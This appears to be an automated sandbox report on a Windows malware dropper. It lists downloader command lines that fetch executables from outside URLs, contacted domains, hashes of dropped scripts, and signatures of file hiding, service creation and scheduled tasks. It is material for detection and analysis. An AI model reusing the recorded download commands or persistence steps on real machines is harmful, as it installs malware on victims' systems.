"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://download.youbak.com/msn/software/partner/36a.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe" "http://down.kuwo.cn/mbox/kwmusic_msnassistant.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | dao666.com | udp |
| HK | 154.220.60.25:80 | dao666.com | tcp |
| HK | 154.220.60.25:80 | dao666.com | tcp |
| US | 8.8.8.8:53 | download.youbak.com | udp |
| HK | 8.210.83.183:80 | download.youbak.com | tcp |
| US | 8.8.8.8:53 | down.kuwo.cn | udp |
| CN | 119.167.147.201:80 | down.kuwo.cn | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install_7xdown.vbs
| MD5 | 3f60b1c32c66c4fafe67b131c81b537e |
| SHA1 | abacf3653d89eff785c76bc9de685210da67409d |
| SHA256 | 306fc7e0980c7e21adf92b220204dfa36baf0f5d107f7de0a167a92f35818a94 |
| SHA512 | 20fcf8215876e448b4d1bfbe8a6ff167cfdb262183364138560b6d5740da0dbf7f0a723763bfc3743240b6fea6fa5f1fa4e25a14a5edb54271bbd7e97fff727a |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tool.cmd
| MD5 | 4e8f8a4f4a836c587f77d3f294286692 |
| SHA1 | b6ae662e53f5d08f7cbc0c06a08d47930dbaf0cc |
| SHA256 | b0367e47ed6fee2d6843d240ac7e83b932466ddd13cc57d971d6cb8e8b2c55a5 |
| SHA512 | 25dfc1a3b4bd4b5c3263f64ae36127bc141138d922316b97bc96c5edd8b84a5b6193b7c687c89ad554d8abee68bc4aad52632a3d98e220352515e380cd749874 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Internet Exploror.lnk
| MD5 | b6090a24bad18a0205bb215cb1fd42e6 |
| SHA1 | da56e637a186333e1fa8401b9600e9efcadbe86b |
| SHA256 | 5cf73d8ba3a6656e804041884cefc0148c3ef80fd4b8633a6647a033082f15f8 |
| SHA512 | 4ca8a5cd200eaf8d8a023c47e7a279e41279c045bf567b81f95e93ca25d5a51dec2786de98efa5b907ec5633c8400e497f6bcaf636d4591d7c42e21ec3039ad4 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\winare.vbs
| MD5 | 4c63083996b714d331f877a7bb204216 |
| SHA1 | de8807c42284e99ba308ea8ad01cc3f4a8894b0a |
| SHA256 | 34666e9c92a0260d690f262a23e89a9b4ffa0c5c25178d0f2c1720f4b8d8b569 |
| SHA512 | f83b239bf307a4864d5f0fcb5c5052b0330ced35af767c48171ca5ec74949aa53219bfe226b9813f0408d979fa0774df89687da1ad36c49ee2ed12e40c842c1d |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\runonce.cmd
| MD5 | 2499bcde9656b2401e95fe6c6d4fe268 |
| SHA1 | dc7bf897affd9f8e4f870be5fa102009a02f22ed |
| SHA256 | 3e0c8d48799b9fb4c275a8332a009d6d0bb0a6315343b45aad43c20cfbd4e2b6 |
| SHA512 | fa3eb6078510a2b70309d279157c60a5ad60c970c35906224ca5a3c9d626ef7b2d2d97fe75a06855a137da80a339ba499e0e4bc8f7fbf88882390710b25289b9 |
\??\PIPE\atsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\copy.cmd
| MD5 | 20e8b5c5e8779c45d0cffeb223e1b4ee |
| SHA1 | e33e7c02fc54766be39b7844f31baae5d474c27e |
| SHA256 | 5412e0c39e7967064c825e6d487f41d356e423f2b60a272213b0909dae1e22b0 |
| SHA512 | 03c707911e6fe9bd190fe645b0743f7e65a8b0175aee8367a84203be9f213b2c4135a360aaeea63469e76d3dc31a9563a9dd2182f3b24c5489c7addd2d184673 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\is.cmd
| MD5 | 83b98633c669411050739335068d2755 |
| SHA1 | de25c70f8b5845375efd44ae5e4386380fe27ead |
| SHA256 | b057b6c505f2257015ca2efbb6ea86ffe0357ee7cae262191349a208ede27639 |
| SHA512 | 920421a1287091d699bee5480c67f906626f5ff8b4ef6629123a99828e7c6a78ddecc814320b9529f105ed60126df481ec8086173adf1b883d674e6ba3a9364f |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360.cmd
| MD5 | 20c2b9872ca6f858414a9251ae37dede |
| SHA1 | 853438b13ee186dcc87d2196781e154289749a0f |
| SHA256 | e22076817c4391fcb6c373a2b5c89c79f814e30534316b4627661151a54aa2bf |
| SHA512 | 716a0ec68f92ef32ce74718e18b56c16095c0a35d29c47e63bdd1d8e8c44967541908cdf9d4ded7906c622c80773f63495c36743ec006a9dc53eed0f429b0192 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\361.cmd
| MD5 | 1e9b64c129e313ec49378f5b823b2ca6 |
| SHA1 | 21ecde39469900b9bd551f4a9576c5a9564d4d60 |
| SHA256 | 87334dcec453b142801040c3084219f840a531c94553f06ee817192c121207ee |
| SHA512 | 0178907df2fa444f463c4c9604bffa7007569daa61b1905dee1b850c9a50754b6bf90c70364ccfc65a609d2dee9f902eefc4b564afcc37fdb253cdfe0bfba840 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\360SE.vbs
| MD5 | 89ec051ab621ccd6ab684bb0f17a25ce |
| SHA1 | 1ef2b94c285bfb602892a6e42b1f4b5ba645315f |
| SHA256 | 0dcd0d2e9c602f4603d9f914a8e4764a6cd6c9c4e986d110b93d846c524110b3 |
| SHA512 | 2ce9c5a5497d68ca5357d6b7ef0239a0bdc8706428e99fe88b2dd3026fb7c734484d77cee088a625bdcadb7eb8e293d728a7525b28614859640806cabb24b001 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\36OSE.vbs
| MD5 | 327cff8c30e74afc5af67a19d82774e5 |
| SHA1 | 13e1be20402e16f7dbf0d86c00f626070f8c9d16 |
| SHA256 | bc3ca0ade216627a479f9e92eb08efb88b38384fb2cb75f14757600d9b27f6d9 |
| SHA512 | 0e7295ea48de989929313ceb0ac06afa490a188c756a5d71835fb04283f968c82bfeec72ea68e6fb2d957e4ab9d5bb49e95ee8ca9d5ad3c04d1abfbe0e18c6da |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cpa.cmd
| MD5 | d102d7237ff395378654c928b119dff0 |
| SHA1 | 9ac16a1749212cc8e3cf6606fc7fcbd05f750c61 |
| SHA256 | 702527cd5541e09286da5e1f47f829798c6e703b1c72c97db5570d1744337f48 |
| SHA512 | cc9a17882cc48c541bd3561d2a71a4a3b75b43e07050a0c5a36e02aba78b647c6d87e392a99c60373a7ec7d034031d7cfadef06e75c91cc2f19ff280207a15f7 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe
| MD5 | efcd1c6575a43499c159bd051ad03a57 |
| SHA1 | a40aa88ffe33d4decb887544a465c6ebfaf216a3 |
| SHA256 | db9aebbfb40f2c8a9dde7d4b9ea3bae5c9b123b4b3049e71bd83e950c1c3d908 |
| SHA512 | e2d312fdfa33a438b004a53da642a177e1db9ebb0b3b15d3a74a37c7ca339f192a1b28890faadc9f3793a34d9dadb299dcbe1c4eae8bd20bee3e055536317880 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe
| MD5 | cab7920419ef7ed1e22e9fc4da013bd1 |
| SHA1 | 48fc6488e928b4fa5ee75ca74ed1548e316bd6db |
| SHA256 | e96c8d5cc0a23032da47280e8835161a959de6965b696328c8a0edf160c3f208 |
| SHA512 | 8393a0160a8e58169554528562e40cf3d4318320475d53377b24dbba42a83026e390a2bb272cdcb89e4d851aac0e75f9cbda65440258569662711f9d1eadc4f0 |
C:\Users\Admin\AppData\Local\Temp\CabE85E.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarE8C0.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1145a808d60fb46ff6e53f25699ffd53 |
| SHA1 | 1022743e315ed40036ac20392558e6f900df0d6e |
| SHA256 | af239a0396e185eb4a1d9480c9e3d429856869e29f16e07f12ae741671e84d93 |
| SHA512 | 7a08c692462fe2bc02f1b390e4e3902c4ce2b77c34f314f7864aae5c5d9463a34ca9d20f18c0183952e73c9ad4aa9be42a1ee1d73bcf5c4cd3e5a9683c67599c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d82d215bd31cb5e28c599368347c14bd |
| SHA1 | 7929752daa8b03a7becd65998c32b8f7289cea44 |
| SHA256 | 2905961af142a3be11c8aa73046eca01473905849feade08403817af06118892 |
| SHA512 | 89d5582e37560c3a58c1e9de26ca7729d496f3b8b37c8911e9605e8007fb3d01a1885ec76be77bfc166a1e3fc4f04efb09f128cc503801d4d0765d52852e0d53 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 753ec20973aa38636339671563e01b24 |
| SHA1 | 9edf1b963d42cd1456978b334c1953d96afbd8c2 |
| SHA256 | 0b85114e55ffd1f20c32a091485f5e3d1d91a67140db2b5a97bc83f21b34d0b8 |
| SHA512 | 418b8206c4ad4a7fceab420f95550f530ad1b714ac716ba8992d9216aa1ffa4d1b377938434c5d0c1f8ebde55f3448489449031c21823bb83c84e159376a0f0f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 227a589768c5dccc2c88644bc521f4ce |
| SHA1 | f2a10b6f86ba8ba9efef0203a5a4d32b5086470f |
| SHA256 | a8fdfb54c0cc1bbbb8b38d4caeb89aadb9c55f33821425dc3e9f661edd145452 |
| SHA512 | b405523d4d1650679b728c93dacfcc1aebf08719f93e5a19a9efc85804b40dbcf85417308bde77b56b338707500966d4ae06af55b3538d77faeb6a8eb793aff0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 09a7776d4f609d9221dfdcd4f96502db |
| SHA1 | d2d8aceaf255334d0ea0963f93ca772181be8123 |
| SHA256 | c36e4929c1daa950edbf63aa808a8f0a1c2d0fc3bbdad7494af217dfd2e78e51 |
| SHA512 | 2cb3ed81ee5dc799c775f79166cba14f137ceaf0a7d67b99470ff048149680af618e344a5c30f6091176c4e850b72e1aac74e325d4f55e0a30a3ceb439dfc8b3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 07a02dd6025d71923603dc43bf121e05 |
| SHA1 | d5ceea5514f3b40e982ad24f51508c719e53c867 |
| SHA256 | d391ba1d3b8603b263bb351c61724a8128e7265c976a39e34a8b303c5080a635 |
| SHA512 | 3b0a7e1dfe839b4a2e80e79795784c591ea4f551d7ff57b9189f05c74edc6eeb094c0b7d136b62b810d4bb522dd88147567375a63ca65084f244232082e0451f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2e16cbe6eb56600242c944906fc9156b |
| SHA1 | 0dc57a6935ebc1025b0369cad6dbdf25519517a6 |
| SHA256 | 9c175c16f7340ecc22bee6520dddc0282a83141e8adc69f89fc844cb0a1c7a49 |
| SHA512 | 8ac06a16b117021b9140dc4b4c8857593fc05e1c4720465dbcdd281884a1d5b97ded97001c600a25c8ed8f39b1ec748993052c7a0cd333721a240608185250ef |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 4db7e2a02c39c3fd77e91fbd1b3c17ab |
| SHA1 | 8300758e7cda6cf9646df2e09ef846ae8ddd079b |
| SHA256 | 9ab44fffecd30e747551d33e72170ff6266b2a089f919f35cd72bc02d1582e02 |
| SHA512 | 64044d6a3323f30ef868260505a4a26974cd1c8dfa71e7fac713bbd3fd760b99fe605d671c2e3c6848c396dbf976ae82ef9d309e1318ec295e985c53f57af040 |
memory/568-553-0x0000000000400000-0x00000000004D1000-memory.dmp
memory/2448-554-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1344-555-0x0000000000400000-0x00000000004D1000-memory.dmp
memory/1344-559-0x0000000000400000-0x00000000004D1000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 91c04bc901180a19d80f81716a635309 |
| SHA1 | c1d207ed13d24ad8a35a564d0c9e9182ef3bd773 |
| SHA256 | 15241e3611b6ff2e4dd3573b107f4fdadf2b149ced89f0b17023a6351577555c |
| SHA512 | dad1349a1275e5a6f3343e85c3590505f89088276aa5ab29f176f2c0e8aa8f6fce1d1ac69221bdfe47f49ad522a5fd80b495f575a039cbd55ae0605602832330 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 18fff44db804d4e04c067166dc50608a |
| SHA1 | a44b90c2a7aadd598523931f00acc778de3ff38e |
| SHA256 | 8cda6b102e07dd7611c7512568ceef6786e9d1c362c3e50c54a0bc6e4d467d1e |
| SHA512 | b2dc54eca27154f7de8c9bd6883b4627ffb66e01df6ce2f133a7f47424372731795123e3bb304402bf2163c4d88ac416cdd09d9cb311bf72aba38588ff7dcc4a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 27307049ffe34dfd5d17d82880c7a18f |
| SHA1 | ca446fdd1dfa155c68c01f6432569f0a165621f8 |
| SHA256 | 80e625ab592b80e5c9cd38a6c91be7079106c7a33f6521883ef7b7e503153503 |
| SHA512 | 7e4f45c18344f81aa3d091093ed44639104a7fe04ef073fa992802578f5e9a20b9e9f3934df5ad206e60510a8de6bc94f728b58b102439a93a35e370d6a2d27b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bca278cf827756717787c15e1577bfb8 |
| SHA1 | c98fe08839f40382d39f25e4d7e706b9bc21bd76 |
| SHA256 | 1d1b86080326061eb97fa581915dfe0832d53874f42601d763a61d7186af20f2 |
| SHA512 | becec77df5c348187d2df725fa326fcdbed961b3193955c5bea67409c4246892b8eeb5116c27d589c4da12efcd7da519a6fadc3e406d813bb9bfad77a698f4bf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a2f72d1817a1dc930f9847fc4fbe5fdc |
| SHA1 | 41485736ca965ee747768a0c32379c45fc7bcc8b |
| SHA256 | bb041c0b5fd8d96c88ff8152d3ce46ff5c619b3a4903b61ae6b19e38e7fe08a6 |
| SHA512 | 28577389dfa0a37ac8293a0953df3db0a048afc720530d7252316dd4b86ed8862407fa422abfae72b5e0fa6086540b147ad75e8d2117d426dec16e2f265153b4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3f37816cf77e190a7cb5021df889efb2 |
| SHA1 | 32b8221464eb7eb6de054116ea3d00433afdd56e |
| SHA256 | 37ff6a6f74a71f20a9e6dce7cf3ada4615177c4b858f22c2bb3f8f4f9a025c20 |
| SHA512 | 63d71f0817c5e97863f36faea9ba12b6f3e1877b986bccd41de1b13dece591905c826ddd3e2bdc2815b7cdaa2eebcfb48773292ab0e9e141a2c2e212147a51a9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 137bd5ac8be9fbf3c407868f796cbd4e |
| SHA1 | a6febc54954378212a43adf3f0a86468c0539bad |
| SHA256 | 27f533259e826feed01f916a3f07dc059ce404cb78a1908346de7e9f63042c61 |
| SHA512 | 07e18188e7047dd625aa85de9dca415b6689a25671ff75b65102da4415959535aafea562f31c80d394868f5a11e21c3bd276f1f5c800234eecce933079b8c8ee |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 000b836c49b00a19cef0d6f55d2e6ba1 |
| SHA1 | 0c6053a8adad5d62eef74a0af5aa9c62572ad708 |
| SHA256 | 01ba502e492462dad8b057594d9d5c23a56100a8e42d78a1e5f840b376fbe64d |
| SHA512 | ab48ce98a067cc9941724cd1e2ebc28ffb1e5e9cbbcf55226361c12d24aca6bb4b96728f9ae08debed9fa25b2a455e7b16c7fd0d2baa4bfaf4c6d8d0d7cfa68a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 414b5cd114d7b7de6e23b6bd1c07fa3d |
| SHA1 | 8e218a3bfb2b4a5254ba511223a40b1e0ee8ca99 |
| SHA256 | 77d8139cfe2833c7ed07c00e336270af91ee513063669620851c1b9018fff7a9 |
| SHA512 | dcb900c86a858f001a7599f6c9f8c2387b89e703720256e19217fc9e98ba0cad1de72697694962ed70775741aa61c689133ea033d04d0743a50d08ce4dcca004 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1cbbde55aa46ec5cadd5c4b3bd5f7ce4 |
| SHA1 | 7294e2c32aa31f74acfc1838443906200104d9f5 |
| SHA256 | cb1e8f1d6bae26a722f3dbc50bd14bcd6ba17c6d6c0d1e6bbab74b66e0c1970c |
| SHA512 | 5a6a91e0c446dcf36771a948519b2ca38311bb8e6bdd3de65408c423789848616f03c6e5e5e7f6a9a542adf255c1ef21730aa2200b4a85667e7540a84dd5a14b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9f8c36aa837e58e3f93f5d987f8a7006 |
| SHA1 | 91f0004806ac2087bb43b27c5bea48fa9df7b208 |
| SHA256 | e55e7b11f8187f8058fc62055eb23c5c0a36cfe7dc1b8adf3101c210a585eb03 |
| SHA512 | f2186a774e15f4a931dac1593762d8edac5706d3ea0b0062d5c36245137fbe2de5c0eb5db2f4cce178981abbc5ce2fe4cadb484683c0623ec1216dd13ae9748c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 84824e6d4ace0f6e049885356b7ad301 |
| SHA1 | dbc8c89b1512f87484a5a990987d396ff26ad926 |
| SHA256 | f826d308d351a14b0989127d32e6cd3842a4651b81e94b1ac2368611f4739e3d |
| SHA512 | fdb977c10019bf3cc5f6bea1117be8fb4d823f204ef3eeceea5f54e12a0a7478c49e1bd0ecbb1b85a8f47e5cc7a00d79bc70206732b67d0a28586c4afefa3d25 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fff6756ab87163018361f36f4f6656c6 |
| SHA1 | 12f7ce54ec863184eb319b4bb947e0c0499735e2 |
| SHA256 | d2b867a68b0839317c335e55b356fa08380e7b327154da2fcda8929b500dccc5 |
| SHA512 | c0cfafe84c2ab5cf8783d486f0ac97c8869463bd491594ba559624a938806d0cb12afb5263810233fd3e4b6c6ed67c448f76ce1ba0eb400a61ef519424ba5174 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-03 08:38
Reported
2024-11-03 08:41
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
144s
Command Line
Signatures
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\8a903fdc2c88d4b47405519f174877cd_JaffaCakes118.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX1\Gaicia.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WinWare\360.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\361.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\Internet Exploror.lnk | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\360.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\Internet Exploror.lnk | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\tool.cmd | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\Windows\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\WinWare\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\tool.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows\360SE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Program Files\Windows\36OSE.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\360.cmd | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\WinWare\tool.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Program Files\WinWare\361.cmd | C:\Windows\SysWOW64\attrib.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Mail\UltraEdit\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdit\is.cmd | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Windows\Mail\UltraEdit\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\Mail\UltraEdit\winare.vbs | C:\Windows\SysWOW64\cmd.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
